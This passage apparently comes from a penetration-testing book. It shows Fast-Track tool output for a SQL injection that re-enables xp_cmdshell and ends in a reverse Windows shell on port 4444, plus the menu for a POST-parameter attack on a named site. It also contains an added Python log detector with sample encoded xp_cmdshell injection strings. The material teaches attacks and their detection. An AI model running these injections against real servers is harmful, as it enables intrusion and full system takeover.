Chapter 11
Running cleanup before executing the payload...
Running the payload on the server...Sending initial request to enable
xp_cmdshell if disabled...
Sending first portion of payload (1/4)...
Sending second portion of payload (2/4)...
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Success! Full access was granted to the system, all through SQL injection.
Note that this attack will not succeed if parameterized SQL queries or
stored procedures are in use. Note, too, that the required configuration
for this attack is very minimal. After selecting SQL Injector - Query String
Parameter Attack from the menu of attacks, you simply direct Fast-Track to
the point of SQL injection. If the xp_cmdshell stored procedure is disabled,
Fast-Track will automatically re-enable it and attempt privilege escalation of
MS SQL.
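From the defender's side, the staged requests described above leave traces in the web server's query-string log. The following is an added example, not code from the book or from Fast-Track: it flags requests whose decoded query string references xp_cmdshell or its configuration and groups them by client. The log field layout, addresses, dates and query values are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Tokens tied to the behaviour described above: re-enabling and calling xp_cmdshell.
SUSPICIOUS = re.compile(r"xp_cmdshell|sp_configure|show\s+advanced\s+options", re.I)

# Constructed W3C-style sample (addresses, dates and queries are made up for this example).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:01 192.0.2.10 GET /index.aspx id=1 200
2024-01-01 10:00:07 198.51.100.7 GET /index.aspx id=1%3BEXEC+sp_configure+%27xp_cmdshell%27%2C1 200
2024-01-01 10:00:08 198.51.100.7 GET /index.aspx id=1%3Bexec+master..XP_CMDSHELL+%27PLACEHOLDER%27 200
2024-01-01 10:00:09 198.51.100.7 GET /index.aspx id=1%253Bexec+xp%255Fcmdshell+%2527PLACEHOLDER%2527 200
2024-01-01 10:00:12 192.0.2.10 GET /search.aspx q=configure+printer 200
"""


def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded input is still matched."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_requests(log_text):
    """Return (client_ip, uri_stem, token) for each request whose query matches."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # skip directives and malformed lines
        client_ip, stem, query = fields[2], fields[4], fields[5]
        match = SUSPICIOUS.search(decode_fully(query))
        if match:
            hits.append((client_ip, stem, match.group(0).lower()))
    return hits


def repeat_offenders(hits, threshold=3):
    """Clients with at least `threshold` flagged requests, as staged sends would produce."""
    counts = Counter(ip for ip, _stem, _token in hits)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    print(flag_requests(SAMPLE_LOG))
```

Query-string logs do not record POST bodies, so this check covers only the query string variant of the attack.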
SQL Injector—POST Parameter Attack
Fast-Track’s POST parameter attack requires even less configuration than
the preceding query string parameter attack. For this attack, simply pass
Fast-Track the URL of the website you want to attack, and it will automatically
detect the form to attack.
Enter which SQL Injector you want to use
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
Enter your choice: 2
This portion allows you to attack all forms on a specific website without having to specify
each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter
looking for both error based injection as well as blind based SQL injection. Simply type
the website you want to attack, and let it roll.
Example: http://www.sqlinjectablesite.com/index.aspx
Enter the URL to attack: http://www.secmaniac.com
Forms detected...attacking the parameters in hopes of exploiting SQL Injection..